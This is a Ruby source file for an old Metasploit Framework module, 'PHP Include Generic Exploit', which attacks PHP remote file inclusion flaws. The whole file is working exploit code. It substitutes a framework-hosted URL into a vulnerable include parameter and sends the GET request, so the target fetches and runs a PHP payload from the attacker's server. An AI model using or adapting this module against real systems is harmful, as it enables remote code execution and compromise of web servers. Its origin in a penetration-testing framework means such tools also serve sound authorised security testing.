require 'msf/core'

module Msf

class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote

	include Exploit::Remote::Tcp
	include Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PHP Include Generic Exploit',
			'Description'    => %q{
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3509 $',
			'References'     =>
				[

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),
				], self.class)
	end

	
	def php_exploit
		connect
		req = "GET #{datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))} HTTP/1.0\r\n\r\n"
		print_status("Sending: #{req}")
		sock.put(req)
		disconnect
	end
	
end
end